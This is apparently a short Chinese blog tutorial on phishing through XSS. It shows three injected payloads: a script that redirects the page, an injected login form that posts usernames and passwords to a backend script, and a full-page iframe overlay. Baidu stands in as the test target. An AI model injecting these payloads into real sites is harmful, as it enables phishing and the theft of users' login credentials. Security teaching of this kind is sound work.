xss漏洞之——釣魚頁面

1.重定向釣魚:把當前頁面重定向到一個釣魚頁面,此處使用百度測試
代碼:

<script>document.location="http://www.baidu.com"</script>

注入後效果:
在這裏插入圖片描述
在這裏插入圖片描述
2.HTML 注入式釣魚:使用 XSS 漏洞注入 HTML 或 JavaScript 代碼到頁面中
代碼(頁面注入一個登陸界面,通過後臺接收):

<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="LPXR.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body></html>

執行效果:
在這裏插入圖片描述
3.iframe 釣魚:通過 標籤嵌入遠程域的一個頁面實施釣魚,此處引入百度進行覆蓋測試
代碼:

<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Title</title></head><body><iframe src="http://www.baidu.com" style="position:absolute;top:0;left:0;width:100%;z-index: 999;height:500px"></iframe></body></html>

執行效果:
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章